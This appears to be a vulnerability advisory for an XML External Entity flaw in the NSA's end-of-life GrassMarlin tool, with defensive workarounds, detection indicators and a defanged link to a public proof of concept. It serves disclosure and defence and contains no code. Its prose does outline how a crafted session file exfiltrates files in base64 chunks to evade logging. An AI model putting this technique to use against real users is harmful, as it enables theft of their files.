Full Report
GrassMarlin leaks sensitive information, provided your targeting phishing skills are sharp enough
Analysis Summary
# Vulnerability: XML External Entity (XXE) in NSA GrassMarlin
## CVE Details
- **CVE ID:** CVE-2026-6807
- **CVSS Score:** 5.5 (Medium)
- **CWE:** CWE-611 (Improper Restriction of XML External Entity Reference)
## Affected Systems
- **Products:** GrassMarlin (NSA-developed OT networking tool)
- **Versions:** All versions (Product is End-of-Life as of 2017)
- **Configurations:** Systems using the version of Java bundled in the original installer; systems where users ingest/open externally provided session files (`.gm3`).
## Vulnerability Description
The vulnerability is an XML External Entity (XXE) flaw resulting from insufficient hardening of the XML parsing process. GrassMarlin saves session data as a collection of XML files (containing node lists, edges, and metadata) bundled into a ZIP archive with a `.gm3` extension. By crafting a malicious `.gm3` file with an external host reference in the Document Type Definition (DTD), an attacker can induce Out-of-Band (OOB) exfiltration of arbitrary files from the host system. The exploit bypasses error logging by base64-encoding the exfiltrated content and transmitting it across multiple message chunks.
## Exploitation
- **Status:** PoC available (Published on GitHub by Rapid7 researcher Anna Quinn)
- **Complexity:** Medium (Requires crafting a specific malicious session file and bypassing certain Java input constraints)
- **Attack Vector:** Local (via social engineering/phishing to trick a user into opening a malicious `.gm3` session file)
## Impact
- **Confidentiality:** High (Successful exploitation allows for the unauthorized exfiltration of arbitrary files from the victim's machine)
- **Integrity:** Low/None
- **Availability:** Low (Potential to cause errors in the application console)
## Remediation
### Patches
- **None:** GrassMarlin reached End-of-Life (EOL) in 2017 and is no longer maintained by the NSA. No official patches will be released.
### Workarounds
- **Isolate Systems:** Ensure Industrial Control Systems (ICS) and SCADA networks are not accessible via the open internet.
- **Network Segmentation:** Isolate firewalled OT devices from business networks.
- **Secure Remote Access:** Use encrypted, authenticated methods for any required remote access.
- **File Integrity:** Only open session files (`.gm3`) from trusted, internally verified sources.
## Detection
- **Indicators of Compromise:**
- Unexpected outbound network traffic to unknown external hosts, particularly on ports associated with DTD fetching or OOB exfiltration.
- Presence of suspicious `.gm3` files received via email or untrusted file shares.
- **Detection Methods and Tools:**
- Network traffic analysis (NSM) to detect base64-encoded strings in outbound messages from OT management workstations.
- Security awareness training focusing on phishing attempts targeting OT engineers.
## References
- **Vendor Advisories:** hxxps[://]www[.]cisa[.]gov/news-events/ics-advisories/icsa-26-118-01
- **PoC Repository:** hxxps[://]github[.]com/SecTestAnnaQuinn/Grassmarlin-CVE-2026-6807-XXE-POC/tree/main